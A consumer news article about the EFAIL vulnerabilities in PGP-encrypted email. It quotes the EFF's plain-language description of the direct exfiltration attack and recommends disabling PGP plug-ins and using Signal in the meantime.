If You Use PGP Encryption, You Should Probably Stop

Photo-Illustration: Select All

Whooooooops!! If you use PGP encryption to protect your email, you might want to disable it for the time being. A team of European researchers have discovered vulnerabilities — they’re calling them “EFAIL” — which “might reveal the plaintext of encrypted emails, including encrypted emails sent in the past.” In the meantime, the researchers and the Electronic Frontier Foundation are recommending that users disable PGP plug-ins for popular email clients like Thunderbird and Apple Mail.

PGP (Pretty Good Privacy) is a popular encryption scheme in which a sender encrypts an email with the recipient’s public key, and the recipient decrypts it with their private key. Email client plug-ins can make this decryption process automatic, and an attacker can exploit that in concert with the way in which emails are rendered using HTML (similar to a web page).

From the EFF:

The first attack is a “direct exfiltration” attack that is caused by the details of how mail clients choose to display HTML to the user. The attacker crafts a message that includes the old encrypted message. The new message is constructed in such a way that the mail software displays the entire decrypted message — including the captured ciphertext — as unencrypted text. Then the email client’s HTML parser immediately sends or “exfiltrates” the decrypted message to a server that the attacker controls.

While near-universal, email has also become a hodgepodge of different protocols and software, making it difficult to safeguard. Cryptography expert Kenn White compared the PGP vulnerability on Twitter to a broken muffler on a totaled car.

In the meantime, you might want to use a different piece of software for encrypted messaging until it gets sorted out. The totally free Signal is a good option, and the encryption scheme used in that app is also incorporated into other messaging apps, such as WhatsApp.

If You Use PGP, You Should Probably Stop